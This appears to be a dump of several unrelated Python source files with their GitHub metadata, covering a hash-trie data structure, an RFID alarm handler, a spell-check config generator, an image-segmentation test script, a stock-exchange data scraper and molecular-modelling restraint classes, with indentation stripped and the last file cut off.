dispatch = BitMapDispatch()
for key, value in enumerate(self.items):
if value is not SENTINEL:
dispatch._ireplace(key, value)
return dispatch
def __iter__(self):
return (item for item in self.items if item is not SENTINEL)
def __copy__(self):
return ListDispatch(items=self.items[:])
def __deepcopy__(self):
return ListDispatch(items=map(deepcopy, self.items))
def map(self, fn):
newitems = []
for elem in self.items:
if elem is not SENTINEL:
elem = fn(elem)
newitems.append(elem)
return ListDispatch(items=newitems)
class BitMapDispatch(Node):
""" Light weight dictionary like object for a little amount of items.
Best used for as most as many items as an integer has bits (usually 32).
Only accepts integers as keys.
The items are stored in a list and whenever an item is added, the bitmap
is ORed with (1 << key) so that the keyth bit is set.
The amount of set bits before the nth bit is used to find the index of the
item referred to by key in the items list.
"""
__slots__ = ['bitmap', 'items']
def __init__(self, bitmap=0, items=None):
if items is None:
items = []
self.bitmap = bitmap
self.items = items
def replace(self, key, item):
""" Return a new BitMapDispatch with the the keyth item replaced
with item. """
# If the item already existed in the list, we need to replace it.
# Otherwise, it will be added to the list at the appropriate
# position.
if len(self.items) >= MAXBITMAPDISPATCH:
new = self.to_listdispatch(BRANCH)
return new._ireplace(key, item)
notnew = bool(self.bitmap & 1 << key)
newmap = self.bitmap | 1 << key
idx = bit_count(self.bitmap & ((1 << key) - 1))
return BitMapDispatch(
newmap,
# If notnew is True, the item that is replaced by the new item
# is left out, otherwise the new item is inserted. Refer to
# _ireplace for a more concise explanation.
self.items[:idx] + [item] + self.items[idx+notnew:]
)
def _ireplace(self, key, item):
""" Replace keyth item with item.
USE WITH CAUTION. """
if len(self.items) >= MAXBITMAPDISPATCH:
new = self.to_listdispatch(BRANCH)
return new._ireplace(key, item)
notnew = bool(self.bitmap & 1 << key)
self.bitmap |= 1 << key
idx = bit_count(self.bitmap & ((1 << key) - 1))
if idx == len(self.items):
self.items.append(item)
elif notnew:
self.items[idx] = item
else:
self.items.insert(idx, item)
return self
def get(self, key, default=None):
""" Get keyth item. If it is not present, return default. """
if not self.bitmap & 1 << key:
return default
return self.items[bit_count(self.bitmap & ((1 << key) - 1))]
def remove(self, key):
""" Return new BitMapDispatch with keyth item removed.
Will not raise KeyError if it was not present. """
idx = bit_count(self.bitmap & ((1 << key) - 1))
return BitMapDispatch(
# Unset the keyth bit.
self.bitmap & ~(1 << key),
# Leave out the idxth item.
self.items[:idx] + self.items[idx+1:]
)
def _iremove(self, key):
""" Remove keyth item. Will not raise KeyError if it was not present.
USE WITH CAUTION. """
idx = bit_count(self.bitmap & ((1 << key) - 1))
self.bitmap &= ~(1 << key)
self.items.pop(idx)
return self
def __getitem__(self, key):
if not self.bitmap & 1 << key:
raise KeyError(key)
return self.items[bit_count(self.bitmap & ((1 << key) - 1))]
def to_listdispatch(self, nitems):
""" Return ListDispatch with the same key to value connections as this
BitMapDispatch. """
return ListDispatch(
None, [self.get(n, SENTINEL) for n in xrange(nitems)]
)
def __iter__(self):
return iter(self.items)
def __nonzero__(self):
return bool(self.items)
def __copy__(self):
return BitMapDispatch(self.bitmap, self.items[:])
def __deepcopy__(self):
return BitMapDispatch(self.bitmap, map(deepcopy, self.items))
def map(self, fn):
return BitMapDispatch(
self.bitmap,
[fn(elem) for elem in self.items]
)
class DispatchNode(Node):
""" Dispatch to children nodes depending of the hsh value at the
current level. """
__slots__ = ['children']
def __init__(self, children=None):
if children is None:
children = BitMapDispatch()
self.children = children
def xor(self, hsh, shift, node):
rlv = relevant(hsh, shift)
newchild = self.children.get(rlv, NULLNODE).xor(hsh, shift + SHIFT, node)
if newchild is NULLNODE:
# This makes sure no dead nodes remain in the tree after
# removing an item.
newchildren = self.children.remove(rlv)
if not newchildren:
return NULLNODE
else:
newchildren = self.children.replace(
rlv,
newchild
)
return DispatchNode(newchildren)
def _ixor(self, hsh, shift, node):
rlv = relevant(hsh, shift)
newchild = self.children[rlv].xor(hsh, shift + SHIFT, node)
if newchild is NULLNODE:
self.children = self.children._iremove(rlv)
if not self.children:
return NULLNODE
else:
self.children = self.children._ireplace(rlv, newchild)
return self
@doc(ASSOC)
def assoc(self, hsh, shift, node):
# We need not check whether the return value of
# self.children.get(...).assoc is NULLNODE, because assoc never
# returns NULLNODE.
rlv = relevant(hsh, shift)
return DispatchNode(
self.children.replace(
rlv,
self.children.get(rlv, NULLNODE).assoc(
hsh, shift + SHIFT, node
)
)
)
@doc(IASSOC)
def _iassoc(self, hsh, shift, node):
rlv = relevant(hsh, shift)
self.children = self.children._ireplace(
rlv,
self.children.get(rlv, NULLNODE)._iassoc(hsh, shift + SHIFT, node)
)
return self
@classmethod
def make(cls, shift, many):
# Because the object we create in this function is not yet exposed
# to any other code, we may safely call _iassoc.
dsp = cls()
for elem in many:
dsp = dsp._iassoc(elem.hsh, shift, elem)
return dsp
@doc(GET)
def get(self, hsh, shift, key):
return self.children.get(relevant(hsh, shift), NULLNODE).get(
hsh, shift + SHIFT, key
)
@doc(WITHOUT)
def without(self, hsh, shift, key):
rlv = relevant(hsh, shift)
newchild = self.children[rlv].without(hsh, shift + SHIFT, key)
if newchild is NULLNODE:
# This makes sure no dead nodes remain in the tree after
# removing an item.
newchildren = self.children.remove(rlv)
if not newchildren:
return NULLNODE
else:
newchildren = self.children.replace(
rlv,
newchild
)
return DispatchNode(newchildren)
@doc(IWITHOUT)
def _iwithout(self, hsh, shift, key):
rlv = relevant(hsh, shift)
newchild = self.children[rlv]._iwithout(hsh, shift + SHIFT, key)
if newchild is NULLNODE:
self.children = self.children._iremove(rlv)
if not self.children:
return NULLNODE
else:
self.children = self.children._ireplace(rlv, newchild)
return self
def __iter__(self):
for child in self.children:
for elem in child:
yield elem
def __copy__(self):
return DispatchNode(self.children.map(copy))
|
fmayer/burrahobbit
|
burrahobbit/_tree.py
|
_tree.py
|
py
| 17,423 |
python
|
en
|
code
| 8 |
github-code
|
6
|
[
{
"api_name": "burrahobbit.util.all",
"line_number": 99,
"usage_type": "call"
},
{
"api_name": "itertools.izip",
"line_number": 99,
"usage_type": "call"
},
{
"api_name": "itertools.izip",
"line_number": 102,
"usage_type": "call"
},
{
"api_name": "copy.copy",
"line_number": 233,
"usage_type": "argument"
},
{
"api_name": "copy.deepcopy",
"line_number": 310,
"usage_type": "argument"
},
{
"api_name": "copy.deepcopy",
"line_number": 427,
"usage_type": "argument"
},
{
"api_name": "copy.copy",
"line_number": 551,
"usage_type": "argument"
}
] |
39463837440
|
# Standard library imports
import serial
import time
import sys
import zerorpc
import datetime
# Application library imports
from MySQLhandler import *
import Utility
SCRIPT_NAME = "RFIDhandler"
TIME_BEFORE_ACTIVATION = 60 * 5
print("Initialize serial connection with Arduino")
try:
s = serial.Serial('/dev/ttyACM0', 9600)
except:
error_msg = "Unable to connect to the Arduino"
print(error_msg)
Utility.launch_fatal_process_alert(SCRIPT_NAME, error_msg)
time.sleep(50000) # Wait a moment for a possible fix
sys.exit() # Close the process and hope for a restart (-> supervisor)
# Each variables store an object capable of inserting, updating and deleting
# in the given t
timeshot = 0
while True:
line = s.readline() # Get the line sent by the Arduino
try:
db_devices = MySQL('devices')
db_alarms = MySQL('alarms')
db_users = MySQL('users')
except:
error_msg = "Unable to connect to the database"
print(error_msg)
Utility.launch_fatal_process_alert(SCRIPT_NAME, error_msg)
time.sleep(50000)
sys.exit()
user = db_users.get('RFID', line.split('\r')[0])
# [user] represents the owner's row of the RFID tag passed
# if it exists
if user:
Utility.switch_led_info(0)
Utility.sound(0)
c = zerorpc.Client()
c.connect("tcp://127.0.0.1:4242")
c.RFID()
alarms = db_alarms.all()
state = bool(alarms[0]['state'])
is_one_alarm_up = False
for alarm in alarms:
is_one_alarm_up = is_one_alarm_up or bool(alarm['state'])
if is_one_alarm_up and not state:
for alarm in alarms:
db_alarms.modify(alarm['id'], 'state', state)
elif not state:
print("[{}]: Waiting {} sec before activation".format(datetime.datetime.now().strftime("%d/%b/%Y %H:%M:%S"), TIME_BEFORE_ACTIVATION))
time.sleep(TIME_BEFORE_ACTIVATION)
for alarm in alarms:
db_alarms.modify(alarm['id'], 'state', not state)
elif state:
print("[{}]: Deactivating".format(datetime.datetime.now().strftime("%d/%b/%Y %H:%M:%S")))
for alarm in alarms:
db_alarms.modify(alarm['id'], 'state', not state)
else:
print("[{}]: Unauthorized tag".format(datetime.datetime.now().strftime("%d/%b/%Y %H:%M:%S")))
c = zerorpc.Client()
c.connect("tcp://127.0.0.1:4242")
c.RFIDError()
|
jeremyalbrecht/Alarm-RPI
|
RFIDhandler.py
|
RFIDhandler.py
|
py
| 2,490 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "serial.Serial",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "Utility.launch_fatal_process_alert",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "sys.exit",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "Utility.launch_fatal_process_alert",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "sys.exit",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "Utility.switch_led_info",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "Utility.sound",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "zerorpc.Client",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.now",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 60,
"usage_type": "attribute"
},
{
"api_name": "time.sleep",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.now",
"line_number": 65,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 65,
"usage_type": "attribute"
},
{
"api_name": "datetime.datetime.now",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 69,
"usage_type": "attribute"
},
{
"api_name": "zerorpc.Client",
"line_number": 70,
"usage_type": "call"
}
] |
38049723382
|
import sys
import os
import yaml
import json
CUSTOM_WORD_LIST_FILENAME = '.wordlist.txt'
def find_wordlist_files(path):
wordlist_paths = []
for root, dirs, files in os.walk(path):
for file in files:
if file.endswith(CUSTOM_WORD_LIST_FILENAME):
wordlist_paths.append(os.path.join(root, file))
return wordlist_paths
if __name__ == '__main__':
spell_check_yaml_path = sys.argv[1]
markdown_base_path = sys.argv[2]
spell_check_yaml = None
with open(spell_check_yaml_path, 'r') as read_file:
spell_check_yaml = yaml.load(read_file, Loader=yaml.FullLoader)
wordlist_paths = find_wordlist_files(markdown_base_path)
print("Adding wordlists: ")
print("\n".join(wordlist_paths))
spell_check_yaml['matrix'][0]['dictionary']['wordlists'].extend(wordlist_paths)
with open(spell_check_yaml_path + ".tmp", 'w') as write_file:
#yaml.dump doesn't work in Python >3, so we dump to JSON instead & convert using yq in the outer script
#yaml.dump(write_file, spell_check_yaml, Dumper=yaml.Dumper)
json.dump(spell_check_yaml, write_file, indent=4)
|
actions-marketplace-validations/jordanbean-msft_wth-spell-check-action
|
generate-spellcheck.py
|
generate-spellcheck.py
|
py
| 1,153 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "os.walk",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "yaml.load",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "yaml.FullLoader",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "json.dump",
"line_number": 35,
"usage_type": "call"
}
] |
29059896663
|
import imageio
import torch
import torch.nn.functional as F
import numpy as np
import os, argparse
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
from net.bgnet import Net
from utils.tdataloader import test_dataset
parser = argparse.ArgumentParser()
parser.add_argument('--testsize', type=int, default=416, help='testing size')
parser.add_argument('--pth_path', type=str, default='./checkpoints/best/BGNet.pth')
for _data_name in ['CAMO','CHAMELEON','COD10K','NC4K']:
data_path = './data/TestDataset/{}/'.format(_data_name)
save_path = './results/BGNet/{}/'.format(_data_name)
opt = parser.parse_args()
model = Net()
model.load_state_dict(torch.load(opt.pth_path))
model.cuda()
model.eval()
os.makedirs(save_path, exist_ok=True)
os.makedirs(save_path+'edge/', exist_ok=True)
image_root = '{}/Imgs/'.format(data_path)
gt_root = '{}/GT/'.format(data_path)
test_loader = test_dataset(image_root, gt_root, opt.testsize)
for i in range(test_loader.size):
image, gt, name = test_loader.load_data()
gt = np.asarray(gt, np.float32)
gt /= (gt.max() + 1e-8)
image = image.cuda()
_, _, res, e = model(image)
res = F.upsample(res, size=gt.shape, mode='bilinear', align_corners=False)
res = res.sigmoid().data.cpu().numpy().squeeze()
res = (res - res.min()) / (res.max() - res.min() + 1e-8)
imageio.imwrite(save_path+name, (res*255).astype(np.uint8))
# e = F.upsample(e, size=gt.shape, mode='bilinear', align_corners=True)
# e = e.data.cpu().numpy().squeeze()
# e = (e - e.min()) / (e.max() - e.min() + 1e-8)
# imageio.imwrite(save_path+'edge/'+name, (e*255).astype(np.uint8))
|
thograce/BGNet
|
etest.py
|
etest.py
|
py
| 1,718 |
python
|
en
|
code
| 57 |
github-code
|
6
|
[
{
"api_name": "os.environ",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "net.bgnet.Net",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "torch.load",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os.makedirs",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "os.makedirs",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "utils.tdataloader.test_dataset",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "numpy.asarray",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 31,
"usage_type": "attribute"
},
{
"api_name": "torch.nn.functional.upsample",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "torch.nn.functional",
"line_number": 36,
"usage_type": "name"
},
{
"api_name": "imageio.imwrite",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 39,
"usage_type": "attribute"
}
] |
21141233312
|
import datetime
import json
import os
import time
import pandas as pd
import requests
from mystockdata import config, db
from mystockdata.db import DatetimeIndexMixin, PrefixedDfDb
from mystockdata.exceptions import HistoryDataError
class ShSeDb(DatetimeIndexMixin, PrefixedDfDb):
prefix = 'sh_se_'
class CybSeDb(DatetimeIndexMixin, PrefixedDfDb):
prefix = 'cyb_se_'
class SzSeDb(DatetimeIndexMixin, PrefixedDfDb):
prefix = 'sz_se_'
class SzzbSeDb(DatetimeIndexMixin, PrefixedDfDb,):
prefix = 'szzb_se_'
class ZxqySeDb(DatetimeIndexMixin, PrefixedDfDb, ):
prefix = 'zxqy_se_'
class SSE:
sedb = ShSeDb()
def read_cache(self):
df = self.sedb.read()
return df
def write_cache(self, df):
df = self.sedb.save(df)
def get_sse_overview_day(self):
'''
source: http://www.sse.com.cn/market/stockdata/overview/day/
'''
def _fetch(date):
url = ('http://query.sse.com.cn/marketdata/tradedata',
'/queryTradingByProdTypeData.do?jsonCallBack=jsonpCallback74321',
'&searchDate=[DAY]&prodType=gp&_=1456558103149')
headers = {
'Host': 'www.sse.com.cn',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36',
'Referer': 'http://www.sse.com.cn/market/stockdata/overview/day/',
}
real_url = ''.join(url).replace('[DAY]', date.strftime("%Y-%m-%d"))
rst = requests.get(url=real_url, headers=headers).text
json_str = rst[19:len(rst) - 1]
rst_list = json.loads(json_str)
rst_list = rst_list['result']
headers = ['istVol', 'SH_profitRate1', 'SH_negotiableValue1', 'SH_trdAmt1', 'SH_trdVol1', 'SH_trdTm1',
'A_istVol', 'A_profitRate1', 'A_negotiableValue1', 'A_trdAmt1', 'A_trdVol1', 'A_trdTm1',
'B_istVol', 'B_profitRate1', 'B_negotiableValue1', 'B_trdAmt1', 'B_trdVol1', 'B_trdTm1']
tmp_dict = dict()
for key, value in rst_list[0].items():
tmp_dict['A_' + key] = value if value else None
for key, value in rst_list[1].items():
tmp_dict['B_' + key] = value if value else None
for key, value in rst_list[2].items():
tmp_dict['SH_' + key] = value if value else None
return pd.DataFrame([tmp_dict, ], index=[date, ])
def _fetch_dates(begin, end, to_df=True):
tmp = []
print(begin, end)
dates = pd.date_range(begin, end)
if len(dates) == 1:
return None
for date in dates:
tmp.append(_fetch(date))
# print(tmp[-1])
if len(dates) > 1:
print('sleep')
time.sleep(0.5)
# print(pd.concat(tmp))
return pd.concat(tmp)
cache_df = self.read_cache()
if cache_df is None or cache_df.empty:
raise HistoryDataError()
else:
start = max(cache_df.index) + datetime.timedelta(days=-1)
new_df = _fetch_dates(
start, datetime.datetime.now())
if new_df is not None:
cache_df = cache_df.drop(new_df.index, errors='ignore')
df = pd.concat([cache_df, new_df])
if len(df) > len(cache_df):
self.write_cache(df)
return df
class SZSE:
dbs = {'sz': SzSeDb(), 'cyb': CybSeDb(),
'zxqy': ZxqySeDb(), 'szzb': SzzbSeDb()}
def read_cache(self, category):
df = self.dbs[category].read()
return df
def write_cache(self, df, category):
df = self.dbs[category].save(df)
def get_szse_overview_day(self, category):
'''
source: http://www.szse.cn/main/marketdata/tjsj/jbzb/
'''
def _fetch(date, category):
urls = {
'sz':
('http://www.szse.cn/szseWeb/ShowReport.szse?',
'SHOWTYPE=EXCEL&CATALOGID=1803&txtQueryDate=%s&ENCODE=1&TABKEY=tab1'),
# 深圳主板
'szzb':
('http://www.szse.cn/szseWeb/ShowReport.szse?',
'SHOWTYPE=EXCEL&CATALOGID=1803&txtQueryDate=%s&ENCODE=1&TABKEY=tab2'),
# 中小企业板
'zxqy':
('http://www.szse.cn/szseWeb/ShowReport.szse?',
'SHOWTYPE=EXCEL&CATALOGID=1803&txtQueryDate=%s&ENCODE=1&TABKEY=tab3'),
# 创业板
'cyb':
('http://www.szse.cn/szseWeb/ShowReport.szse?',
'SHOWTYPE=EXCEL&CATALOGID=1803&txtQueryDate=%s&ENCODE=1&TABKEY=tab4')}
df = pd.read_html(''.join(urls[category]) % date.strftime(
"%Y-%m-%d"), encoding='gbk', header=0)[0]
if df.columns[0] == '没有找到符合条件的数据!':
return None
if category in ('szzb', 'cyb', 'zxqy'):
del df['比上日增减']
del df['本年最高']
del df['最高值日期']
if category == 'sz':
del df['比上日增减']
del df['幅度%']
del df['本年最高']
del df['最高值日期']
df = pd.pivot_table(df, columns='指标名称')
df.index = pd.DatetimeIndex([date.strftime("%Y-%m-%d")])
return df
def _fetch_dates(begin, end, category):
tmp = []
print(begin, end)
dates = pd.date_range(begin, end)
if len(dates) == 1:
return None
for date in dates:
tmp.append(_fetch(date, category))
if len(dates) > 1:
print('sleep')
time.sleep(0.5)
return pd.concat(tmp)
cache_df = self.read_cache(category)
if cache_df is None or cache_df.empty:
raise HistoryDataError()
else:
start = max(cache_df.index) + datetime.timedelta(days=-1)
new_df = _fetch_dates(start, datetime.datetime.now(), category)
if new_df is not None:
cache_df = cache_df.drop(new_df.index, errors='ignore')
df = pd.concat([cache_df, new_df])
if len(df) > len(cache_df):
self.write_cache(df, category)
return df
class SE:
@classmethod
def get_overview_day_field(cls, f_sha, f_shb, f_sh, f_sz, f_cyb, f_zxqy, f_szzb):
sh, sz, cyb, zxqy, szzb = ShSeDb(), SzSeDb(), CybSeDb(), ZxqySeDb(), SzzbSeDb()
sh = sh.read(columns=[f_sha, f_shb, f_sh])
sh.columns = ['SHA', 'SHB', 'SH']
sz = sz.read(columns=[f_sz])
sz.columns = ['SZ']
cyb = cyb.read([f_cyb])
cyb.columns = ['CYB']
zxqy = zxqy.read([f_zxqy])
zxqy.columns = ['ZXQY']
szzb = szzb.read([f_szzb])
szzb.columns = ['SZZB']
df = pd.concat([sh, sz, cyb, zxqy, szzb, ], axis=1)
df = df.fillna(method='bfill')
return df
@classmethod
def get_pe(cls):
return cls.get_overview_day_field('A_profitRate1', 'B_profitRate1', 'SH_profitRate1',
'股票平均市盈率', '平均市盈率(倍)', '平均市盈率(倍)', '平均市盈率(倍)',)
@classmethod
def get_market_val(cls):
df = cls.get_overview_day_field('A_marketValue1', 'B_marketValue1', 'SH_marketValue1',
'股票总市值(元)', '上市公司市价总值(元)', '上市公司市价总值(元)', '上市公司市价总值(元)',)
df[['SZ', 'CYB', 'ZXQY']] = df[['SZ', 'CYB', 'ZXQY']] / 100000000
return df
@classmethod
def get_negotiable_val(cls):
df = cls.get_overview_day_field('A_negotiableValue', 'B_negotiableValue', 'SH_negotiableValue',
'股票流通市值(元)', '上市公司流通市值(元)', '上市公司流通市值(元)', '上市公司流通市值(元)',)
df[['SZ', 'CYB', 'ZXQY']] = df[['SZ', 'CYB', 'ZXQY']] / 100000000
return df
@classmethod
def get_avg_price(cls):
sh, sz, cyb, zxqy, szzb = self.get_overview_day()
sh_a = sh['A_trdAmt'].apply(
float) * 10000 / sh['A_trdVol'].apply(float)
sh_a.name = 'SHA'
sh_b = sh['B_trdAmt'].apply(
float) * 10000 / sh['B_trdVol'].apply(float)
sh_b.name = 'SHB'
sh_sh = sh['SH_trdAmt'].apply(
float) * 10000 / sh['SH_trdVol'].apply(float)
sh_sh.name = 'SH'
sz = sz['平均股票价格(元)']
sz.name = 'SZ'
cyb = cyb['总成交金额(元)'] / cyb['总成交股数']
cyb.name = 'CYB'
zxqy = zxqy['总成交金额(元)'] / zxqy['总成交股数']
zxqy.name = 'ZXQY'
szzb = szzb['总成交金额(元)'] / szzb['总成交股数']
szzb.name = 'SZZB'
df = pd.concat([sh_a, sh_b, sh_sh, sz, cyb, zxqy, szzb, ], axis=1)
return df
def load_old_file():
def read_file(file):
path = os.path.abspath(os.path.dirname(__file__))
df = pd.read_csv(os.path.join(path, file))
df.index = pd.DatetimeIndex(df.date)
del df['date']
return df
ShSeDb().save(read_file('files/se/sh_sse_day_overview.csv'))
SzSeDb().save(read_file('files/se/sz_day_overview.csv'))
CybSeDb().save(read_file('files/se/cyb_day_overview.csv'))
SzzbSeDb().save(read_file('files/se/szzb_day_overview.csv'))
ZxqySeDb().save(read_file('files/se/zxqy_day_overview.csv'))
for key in db.DfDb().keys():
print(key)
|
onecans/my
|
mystockdata/mystockdata/se.py
|
se.py
|
py
| 9,831 |
python
|
en
|
code
| 2 |
github-code
|
6
|
[
{
"api_name": "mystockdata.db.DatetimeIndexMixin",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "mystockdata.db.PrefixedDfDb",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "mystockdata.db.DatetimeIndexMixin",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "mystockdata.db.PrefixedDfDb",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "mystockdata.db.DatetimeIndexMixin",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "mystockdata.db.PrefixedDfDb",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "mystockdata.db.DatetimeIndexMixin",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "mystockdata.db.PrefixedDfDb",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "mystockdata.db.DatetimeIndexMixin",
"line_number": 30,
"usage_type": "name"
},
{
"api_name": "mystockdata.db.PrefixedDfDb",
"line_number": 30,
"usage_type": "name"
},
{
"api_name": "requests.get",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 79,
"usage_type": "call"
},
{
"api_name": "pandas.date_range",
"line_number": 84,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 93,
"usage_type": "call"
},
{
"api_name": "pandas.concat",
"line_number": 95,
"usage_type": "call"
},
{
"api_name": "mystockdata.exceptions.HistoryDataError",
"line_number": 99,
"usage_type": "call"
},
{
"api_name": "datetime.timedelta",
"line_number": 101,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.now",
"line_number": 103,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 103,
"usage_type": "attribute"
},
{
"api_name": "pandas.concat",
"line_number": 106,
"usage_type": "call"
},
{
"api_name": "pandas.read_html",
"line_number": 150,
"usage_type": "call"
},
{
"api_name": "pandas.pivot_table",
"line_number": 165,
"usage_type": "call"
},
{
"api_name": "pandas.DatetimeIndex",
"line_number": 166,
"usage_type": "call"
},
{
"api_name": "pandas.date_range",
"line_number": 172,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 179,
"usage_type": "call"
},
{
"api_name": "pandas.concat",
"line_number": 181,
"usage_type": "call"
},
{
"api_name": "mystockdata.exceptions.HistoryDataError",
"line_number": 185,
"usage_type": "call"
},
{
"api_name": "datetime.timedelta",
"line_number": 187,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.now",
"line_number": 188,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 188,
"usage_type": "attribute"
},
{
"api_name": "pandas.concat",
"line_number": 191,
"usage_type": "call"
},
{
"api_name": "pandas.concat",
"line_number": 217,
"usage_type": "call"
},
{
"api_name": "pandas.concat",
"line_number": 267,
"usage_type": "call"
},
{
"api_name": "os.path.abspath",
"line_number": 273,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 273,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 273,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 274,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 274,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 274,
"usage_type": "attribute"
},
{
"api_name": "pandas.DatetimeIndex",
"line_number": 275,
"usage_type": "call"
},
{
"api_name": "mystockdata.db.DfDb",
"line_number": 284,
"usage_type": "call"
},
{
"api_name": "mystockdata.db",
"line_number": 284,
"usage_type": "name"
}
] |
2088974749
|
"""@namespace IMP.pmi.restraints.proteomics
Restraints for handling various kinds of proteomics data.
"""
from __future__ import print_function
import IMP
import IMP.core
import IMP.algebra
import IMP.atom
import IMP.container
import IMP.pmi
import IMP.pmi.tools
import IMP.pmi.output
import numpy
import math
import sys
import warnings
class ConnectivityRestraint(object):
'''
generate a connectivity restraint between domains
setting up the restraint
example:
sel1 = IMP.atom.Selection(root_hier, molecule="Rpb3",
residue_indexes=range(1,100))
sel2 = IMP.atom.Selection(root_hier, molecule="Rpb4",
residue_indexes=range(1,100))
cr=restraints.ConnectivityRestraint((sel1, sel2), label='CR1')
cr.add_to_model()
Multistate support =No
Resolution=Yes
'''
def __init__(self, domains, kappa=10.0, resolution=None, label="None"):
self.weight = 1.0
self.kappa = kappa
self.label = label
cr = IMP.atom.create_connectivity_restraint(
domains, self.kappa, self.label)
self.m = cr.get_model()
self.rs = IMP.RestraintSet(self.m, label)
self.rs.add_restraint(cr)
def set_label(self, label):
self.label = label
self.rs.set_name(label)
for r in self.rs.get_restraints():
r.set_name(label)
def add_to_model(self):
IMP.pmi.tools.add_restraint_to_model(self.m, self.rs)
def get_restraint(self):
return self.rs
def get_restraints(self):
rlist = []
for r in self.rs.get_restraints():
rlist.append(IMP.core.PairRestraint.get_from(r))
return rlist
def set_weight(self, weight):
self.weight = weight
self.rs.set_weight(weight)
def get_output(self):
output = {}
score = self.weight * self.rs.unprotected_evaluate(None)
output["_TotalScore"] = str(score)
output["ConnectivityRestraint_" + self.label] = str(score)
return output
#
class CompositeRestraint(object):
'''
handleparticles a list of particles
compositeparticles is a list of list of particles
'''
def __init__(self, handle_particles, composite_particles, cut_off=5.0,
lam=1.0, plateau=0.0, resolution=None, label="None"):
# composite particles: all particles beside the handle
self.label = label
hs = IMP.pmi.tools.input_adaptor(handle_particles, resolution,
flatten=True)
self.handleparticles = [h.get_particle() for h in hs]
self.m = self.handleparticles[0].get_model()
self.rs = IMP.RestraintSet(self.m, 'cr')
self.compositeparticles = []
compositeparticle_list = []
for cp in composite_particles:
hs = IMP.pmi.tools.input_adaptor(cp, resolution, flatten=True)
tmplist = [h.get_particle() for h in hs]
compositeparticle_list.append(tmplist)
self.compositeparticles += tmplist
ln = IMP.pmi.CompositeRestraint(
self.m, self.handleparticles, cut_off, lam, True, plateau)
for ps in compositeparticle_list:
# composite particles is a list of list of particles
ln.add_composite_particle(ps)
self.rs.add_restraint(ln)
def set_label(self, label):
self.label = label
def get_handle_particles(self):
return self.handleparticles
def get_composite_particles(self):
return self.compositeparticles
def get_restraint(self):
return self.rs
def add_to_model(self):
IMP.pmi.tools.add_restraint_to_model(self.m, self.rs)
def get_output(self):
output = {}
score = self.rs.unprotected_evaluate(None)
output["_TotalScore"] = str(score)
output["CompositeRestraint_" + self.label] = str(score)
return output
#
class AmbiguousCompositeRestraint(object):
'''
this restraint allows ambiguous cross-linking between multiple copies
excluding between symmetric copies
It allows name ambiguity
'''
def __init__(self, root_hier, restraints_file, cut_off=5.0, lam=1.0,
plateau=0.01, resolution=None, label="None"):
self.weight = 1.0
self.m = root_hier.get_model()
self.rs = IMP.RestraintSet(self.m, 'data')
self.label = "None"
self.pairs = []
self.outputlevel = "low"
self.cut_off = cut_off
self.lam = lam
self.plateau = plateau
fl = IMP.pmi.tools.open_file_or_inline_text(restraints_file)
for line in fl:
tokens = line.split()
# skip character
if (tokens[0] == "#"):
continue
r1 = int(tokens[2])
c1 = tokens[0]
r2 = int(tokens[3])
